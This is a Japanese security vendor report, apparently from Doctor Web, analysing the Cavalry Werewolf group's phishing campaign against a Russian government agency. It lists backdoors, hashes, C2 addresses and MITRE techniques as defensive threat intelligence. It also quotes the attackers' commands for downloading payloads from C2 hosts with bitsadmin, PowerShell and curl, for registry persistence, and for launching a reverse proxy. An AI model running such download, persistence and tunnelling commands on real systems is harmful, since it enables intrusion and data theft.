ハッカー集団「Cavalry Werewolf」がロシア政府機関を攻撃

ウイルスアラート | Hot news | 全てのニュース

2025年11月11日

序論

2025年7月、Doctor Webはクライアントであるロシア政府機関の1つから、内部ネットワークが侵害されている疑いがあるという連絡を受けました。疑いを抱くきっかけとなったのは、同機関のメールアドレスの1つからスパムメールが送信されていることが検出されたことでした。Doctor Webのアンチウイルスラボによるインシデント調査の結果、当該機関はハッカー集団による標的型攻撃を受けていたことが明らかになり、その集団は「Cavalry Werewolf」であることが特定されました。この攻撃は機密情報とネットワーク設定データを収集することを目的の1つとしたものでした。

この調査において、Doctor Webのエキスパートはオープンソースツールを含むこれまでに知られていなかったマルウェアを特定することに成功しました。それらの一部として、攻撃対象システム上でのリモートコマンド実行を可能にし、偵察とそれに続くネットワークインフラストラクチャ内での足場固めのための環境を整える複数のバックドアが確認されています。

本稿では、発見されたCavalry Werewolfのツールや同ハッカー集団の特徴、そしてこれらのサイバー犯罪者たちが侵害されたネットワーク内で実行する典型的なアクションについて解説します。

攻撃および使用されたツールに関する全般的情報

1台目のコンピューターに対する初期アクセス(最初のアクセス)には一般的な攻撃ベクトルが用いられています。すなわち、文書に偽装したマルウェアの添付されたフィッシングメールです。今回の事例では、攻撃時点で未知のバックドアであったBackDoor.ShellNET.1がメッセージに含まれていました。これはオープンソースソフトウェアReverse-Shell-CSをベースにしたバックドアで、感染したシステムにリバースシェル経由でリモート接続してさまざまなコマンドを実行することを可能にします。このバックドアはパスワード保護されたアーカイブ内に仕込まれており、フィッシングキャンペーンごとに異なる名前が付いています。

BackDoor.ShellNET.1に付けられたファイル名のバリエーション
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

BackDoor.ShellNET.1の添付されたフィッシングメールの例:攻撃者は「文書」を読むよう受信者に促し、アーカイブを解凍するためのパスワードを提供している

攻撃者は BackDoor.ShellNET.1 を使用して標的システム内での足がかりの構築を進めました。ファイル転送タスクを管理するためのWindows標準ツールBitsadmin(C:\Windows\SysWOW64\bitsadmin.exe)を介して複数の悪意のあるプログラムがダウンロードされています。このプログラムは特定のコマンドラインスイッチを使用して現在のシステム管理者として起動されていました。以下はその例です

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

BackDoor.ShellNET.1 によって最初にダウンロードされた脅威はスティーラーTrojan.FileSpyNET.5でした。このトロイの木馬を使用して、攻撃者はコンピューター上に保存されている .doc、.docx、.xlsx、.pdf 形式の文書、テキストファイル(.txt)、画像ファイル (.jpg、.png)をダウンロードしています。

次に、バックドアBackDoor.Tunnel.41(オープンソースソフトウェアReverseSocks5)がインストールされました。攻撃者はこのバックドアを使用することでSOCKS5トンネルを作成して密かにコンピューターに接続し、そこでコマンドを実行(別のマルウェアをインストールするなど)しています。

Cavalry Werewolfのツール

今回のインシデントに関する調査の結果、Cavalry Werewolfによる標的型攻撃では上記のマルウェアのみでなく他のツールも多数使用されていることが明らかになりました。Cavalry Werewolfのマルウェア作成者は武器として用いるマルウェアの組み合わせを1つにとどめることなく、その数を常に増やし続けているという点に注意する必要があります。そのため、標的システムへの侵入に使用されるツールや感染チェーンにおけるその先の段階は、攻撃対象となる組織によって異なる場合があります。

エントリーポイント(侵入口)

感染チェーンの第一段階となるのはCavalry Werewolfから送信されるフィッシングメールに仕込まれたマルウェアです。ただし、それらマルウェアの種類は1つだけではありません。Doctor Webのウイルスアナリストによって以下が特定されています。

BAT.DownLoader.1138

PowerShellバックドアPowerShell.BackDoor.109を標的システムにダウンロードするバッチファイルです。このバックドアはコンピューター上に別のマルウェアをダウンロードして起動する目的で攻撃者によって使用されます。

BAT.DownLoader.1138の既知のファイル名 SHA1ハッシュ С2サーバー
scan26_08_2025.bat d2106c8dfd0c681c27483a21cc72d746b2e5c18c 168[.]100.10[.]73

Trojan.Packed2.49708

本体内に暗号化された形で格納されているバックドアBackDoor.Spy.4033をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。

Trojan.Packed2.49708の既知のファイル名 SHA1ハッシュ С2サーバー
О проведении личного приема граждан список участников план и проведенная работа.exe

C:\Windows\2o1nzu.exe
5684972ded765b0b08b290c85c8fac8ed3fea273 185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe 29ee3910d05e248cfb3ff62bd2e85e9c76db44a5 185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe

Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe

План-протокол встречи о сотрудничестве представителей должн.лиц.exe
ce4912e5cd46fae58916c9ed49459c9232955302 109[.]172.85[.]95
C:\Windows\746wljxfs.exe 653ffc8c3ec85c6210a416b92d828a28b2353c17 185[.]173.37[.]67
b52e1c9484ab694720dc62d501deca2aa922a078 109[.]172.85[.]95

Trojan.Siggen31.54011

本体内に暗号化された形で格納されているバックドアBackDoor.Spy.4038をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。

Trojan.Siggen31.54011の機能はTrojan.Packed2.49708と似ていますが、ペイロードの抽出アルゴリズムがわずかに異っています。

SHA1ハッシュ С2サーバー
baab225a50502a156222fcc234a87c09bc2b1647 109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc 109[.]172.85[.]63

BackDoor.Siggen2.5463

Telegramボットを介して操作され、攻撃者から受け取ったタスクを実行するバックドアです。このマルウェアのメイン機能は本体内に隠されたPowerShellコードにあります。

BackDoor.Siggen2.5463の既知のファイル名 SHA1ハッシュ ペイロード
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe

system.exe
c96beb026dc871256e86eca01e1f5ba2247a0df6 PowerShell.BackDoor.108

BackDoor.RShell.169

攻撃者がリバースシェル経由で感染したコンピューターにリモート接続し、さまざまなコマンドを実行できるようにするバックドアです。

BackDoor.RShell.169の既知のファイル名 SHA1ハッシュ С2サーバー
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe

Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe
633885f16ef1e848a2e057169ab45d363f3f8c57 109[.]172.85[.]63

BackDoor.ReverseShell.10

リバースシェルを有効にし、攻撃者にシステムへのリモートアクセスを提供するバックドアです。

BackDoor.ReverseShell.10の既知のファイル名 SHA1ハッシュ С2サーバー
к проектам.exe

Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe
dd98dcf6807a7281e102307d61c71b7954b93032 195[.]2.78[.]133
Служебная записка от 20.08.2025                                                                      .exe

Служебная записка от 12.08.2025                                                                      .exe

f546861adc7c8ca88e3b302d274e6fffb63de9b0 62[.]113.114[.]209

次の感染段階

デバイスが侵害された後、その感染したデバイス上には以下のマルウェアがインストールされる可能性があります。

Trojan.Inject5.57968

本体内に暗号化されたバックドアを持つトロイの木馬です。そのバックドアは、攻撃者が感染したコンピューターに悪意のあるプログラムをダウンロードすることを可能にします。ペイロードの復号化は複数の段階で実行され、そのうちの1つで、Microsoft .NET Frameworkパッケージの一部であるaspnet_compiler.exeプログラムのプロセスに悪意のあるデータ配列が挿入されます。その後、完全に復号化されたバックドアがこの正規アプリのプロセスコンテキスト内で動作します。

インタラクティブな脅威アナライザーDr.Web vxCube の「サンドボックス」を使用した、Trojan.Inject5.57968のアクティビティ調査

Trojan.Inject5.57968の既知のファイル名 SHA1ハッシュ С2サーバー ペイロード
pickmum1.exe e840c521ec436915da71eb9b0cfd56990f4e53e5 64[.]95.11[.]202 Trojan.PackedNET.3351
mummyfile1.exe 22641dea0dbe58e71f93615c208610f79d661228 64[.]95.11[.]202 Trojan.PackedNET.3351

BackDoor.ShellNET.2

Telegramボットを介して操作され、攻撃者から受け取ったコマンドを実行するバックドアです。

BackDoor.ShellNET.2の既知のファイル名 SHA1ハッシュ
win.exe 1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

オープンソースソフトウェアReverseSocks5をベースにしたバックドアで、感染したシステム上でSOCKS5プロキシを有効にしてリモートアクセスを可能にします。BackDoor.ReverseProxy.1-connect IPパラメータを指定してコマンドインタープリタcmd.exeから起動されることにより、目的のアドレスに接続します。アドレスがハードコードされている亜種も存在します。

以下のIPアドレスが検出されています。

  • 78[.]128.112[.]209 (起動コマンドで指定)
  • 96[.]9.125[.]168 (起動コマンドで指定)
  • 188[.]127.231[.]136 (ハードコード)
BackDoor.ReverseProxy.1の既知のファイル名 SHA1ハッシュ
revv2.exe 6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

攻撃者によって悪意のあるコードが埋め込まれた、正規プログラムのトロイの木馬化されたバージョンの検出名です。アーカイバWinRarおよび7-Zip、開発ツールVisual Studio Code、テキストエディタAkelPadをはじめとする複数のアプリの悪意のある改変版が発見されています。メッセンジャーMAXに偽装したSumatra PDF Readerもそのうちの1つです。改変版は本来の機能を実行することはできず、起動されると埋め込まれたトロイの木馬コンポーネントを初期化するだけです。

これらの改変版には、サイバー犯罪者の目的に応じてあらゆる種類のマルウェアが仕込まれています。以下はその一部です。

Trojan.Packed2.49862の既知のファイル名 SHA1ハッシュ С2サーバー ペイロード
code.exe
rev2.exe
8279ad4a8ad20bf7bbca0fc54428d6cdc136b776 188[.]127.231[.]136 BackDoor.ReverseProxy.1
code.exe
revv.exe
a2326011368d994e99509388cb3dc132d7c2053f 192[.]168.11[.]10 BackDoor.ReverseProxy.1
7zr.exe
winload.exe
system.exe
Recorded_TV.exe
451cfa10538bc572d9fd3d09758eb945ac1b9437 77[.]232.42[.]107 BackDoor.Shell.275
Command line RAR
winlock.exe
Recorded_TV.exe
a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2 77[.]232.42[.]107 BackDoor.AdaptixC2.11
winsrv.exe
firefox.exe
bbe3a5ef79e996d9411c8320b879c5e31369921e 94[.]198.52[.]210 BackDoor.AdaptixC2.11
AkelPad.exe e8ab26b3141fbb410522b2cbabdc7e00a9a55251 78[.]128.112[.]209 BackDoor.Havoc.16
7z.exe dcd374105a5542ef5100f6034c805878153b1205 192[.]168.88[.]104 BackDoor.Meterpreter.227
7z.exe e51a65f50b8bb3abf1b7f2f9217a24acfb3de618 192[.]168.1[.]157 Trojan.Siggen9.56514
7z.exe
chromedriver.exe
d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4 Telegram-бот Trojan.Clipper.808
7z
7z.exe
svc_host.exe
dzveo09ww.exe
c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81 Telegram-бот Trojan.Clipper.808
b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5 Telegram-бот Trojan.Clipper.808
max - для бизнеса.exe b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231 89[.]22.161[.]133 BackDoor.Havoc.16

侵害されたネットワーク内でCavalry Werewolfが実行する典型的なアクション

標的となる組織のコンピューターインフラストラクチャに侵入した攻撃者は、データ収集やシステム内でのさらなる足場固めを目的としたさまざまなアクションを実行します。

感染させたコンピューターに関する情報を収集するために、以下のコマンドを実行します。

  • whoami — カレントユーザーに関する情報を取得する
  • dir C:\\users\\<user>\\Downloads — カレントユーザーの「ダウンロード」フォルダ内にあるファイルのリストを取得する
  • dir C:\\users\\public\\pictures\\ — 共有フォルダの「ピクチャ」フォルダ内にあるファイルのリストを取得する(どのマルウェアがすでにシステム内にダウンロードされているかを特定するため)
  • ipconfig /all — ネットワーク設定を取得する
  • net user — システム内のすべてのユーザーのリストを取得する

プロキシサーバーに関する情報を収集し、ネットワークの機能をチェックするために、以下のコマンドを使用します。

  • powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
  • curl -I https://google.com
  • curl -I https://google.com -x <proxy>

以下のツールを使用してネットワークを設定します。

  • Windows OSに含まれているコマンドラインツールnetsh

続けて、以下の正規ツールを使用して悪意のあるツールをシステムに送り込みます。

  • PowerShell (例: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe
  • Bitsadmin (例: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe
  • curl (例: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe

システム内での足場を固めるために以下を実行します。

  • Windowsレジストリを変更する(例:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\users\public\pictures\win.exe /f

コマンドラインインタープリタcmd.exe を使用して悪意のあるツールを起動します。
例:

  • C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443BackDoor.ReverseProxy.1;
  • C:\\users\\public\\pictures\\732.exeBackDoor.Tunnel.41.

攻撃者はPowerShellを使用して悪意のあるツールを削除できます。
例:

  • powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

また、pingコマンドを使用してC2サーバーが利用可能であるかどうか定期的にチェックすることもできます。

ハッカー集団Cavalry Werewolfの特徴

ハッカー集団Cavalry Werewolfの大きな特徴として以下が挙げられます。

  • オープンソースソフトウェアを好んで使用する(オリジナルをそのまま使用する場合と、それをベースに独自のツールを開発する場合がある)。
  • メインとなるツールは、感染したシステム上でのリモートコマンド実行を可能にするさまざまなリバースシェルバックドアである。
  • 元々は無害なプログラムに悪意のあるコードを埋め込むことができる。
  • 感染したコンピューターを制御するためにTelegram APIを使用することが多い。
  • 侵害したメールアドレスを使用して政府機関を装ったメールを送信するというフィッシングキャンペーンによって、感染の第一段階を担うマルウェアを送り込む。
  • その後の感染段階を担うマルウェアを標的デバイスにダウンロードするために、C:\\users\\public\\picturesC:\\users\\public\\librariesC:\\users\\public\\downloadsディレクトリを使用する。

このたび特定されたCavalry Werewolfのツールに関する詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。

BackDoor.ReverseProxy.1 の詳細 ※英語
BackDoor.ReverseShell.10 の詳細 ※英語
BackDoor.RShell.169 の詳細 ※英語
BackDoor.ShellNET.1 の詳細 ※英語
BackDoor.ShellNET.2 の詳細 ※英語
BackDoor.Siggen2.5463 の詳細 ※英語
BackDoor.Tunnel.41 の詳細 ※英語
BAT.DownLoader.1138 の詳細 ※英語
Trojan.Siggen31.54011 の詳細 ※英語
Trojan.Clipper.808 の詳細 ※英語
Trojan.FileSpyNET.5 の詳細 ※英語
Trojan.Inject5.57968 の詳細 ※英語
Trojan.Packed2.49708 の詳細 ※英語
Trojan.Packed2.49862 の詳細 ※英語

MITREマトリックス

Stage(段階) Technique(技術・手法)
Initial access(初期アクセス) T1566.001:Spearphishing attachment(スピアフィッシング添付ファイル)
Execution(実行) T1204:User execution(ユーザーによる実行)

T1059.001:PowerShell

T1059.003:Windows Command Shell
Persistence(永続化) T1547.001:Registry Run Keys / Startup Folder (レジストリRunキー/スタートアップフォルダ)

T1197:BITS Jobs (BITSジョブ)
Privilege Escalation(権限昇格) T1548.002:Bypass User Account Control(ユーザーアカウント制御のバイパス)
Defense Evasion(防御回避) T1197:BITS Jobs(BITSジョブ)
Command and Control(コマンド・アンド・コントロール) T1090.002:External Proxy(外部プロキシ)

T1102.002:Bidirectional Communication(双方向通信)
Exfiltration(情報窃取) T1041:Exfiltration Over C2 Channel(C2チャネルを介した盗み出し)

T1567:Exfiltration Over Web Service(Webサービスを介した盗み出し)
Indicators of compromise(侵害の痕跡)※英語
0
新着ニュース 全てのニュース